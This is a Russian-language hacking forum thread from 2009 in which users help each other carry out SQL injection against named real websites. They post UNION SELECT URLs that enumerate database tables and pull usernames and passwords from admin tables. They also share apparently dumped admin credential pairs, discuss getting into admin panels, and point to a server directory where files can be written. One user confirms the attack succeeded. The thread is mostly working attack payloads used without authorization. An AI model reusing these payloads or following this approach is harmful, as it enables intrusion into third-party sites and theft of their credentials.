
13.11.2009, 21:53
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
На этом сайте есть таблица user
http://www.pcci.org.za/default.asp?id=946
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id = 946''.
/default.asp, line 128
http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2
http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/default.asp, line 128
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
|
|
|

13.11.2009, 20:25
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от apekoff
вот как получается правильный путь - но записи нету  ,почему?
может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом
|
|
|

13.11.2009, 21:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
apekoff, на тебе диру под запись:
/home/virtual/site3/fst/var/www/html/docs/
гугл всемогущий...или брюс. Похрен впрочем. Лейся.
|
|
|

13.11.2009, 21:43
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpa ssword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin
но опять ничего не подошло, посмотрите плиз)
|
|
|

13.11.2009, 21:46
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
но опять ничего не подошло, посмотрите плиз)
Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))
Возможно таблица юзеров от чего то другого
|
|
|

13.11.2009, 21:50
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)
|
|
|

13.11.2009, 21:58
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
FlaktW,
http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6
id=-1+union+select+username,password+from+ADMINISTRATO RS
Последний раз редактировалось ElteRUS; 13.11.2009 в 22:02..
|
|
|

13.11.2009, 22:25
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от ElteRUS
FlaktW,
http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6
id=-1+union+select+username,password+from+ADMINISTRATO RS
Thanks, все получилось.
|
|
|

13.11.2009, 22:39
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами:
8681832
Репутация:
0
|
|
Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.
Последний раз редактировалось fng; 13.11.2009 в 22:46..
|
|
|

13.11.2009, 22:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)
Последний раз редактировалось jecka3000; 13.11.2009 в 22:22..
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|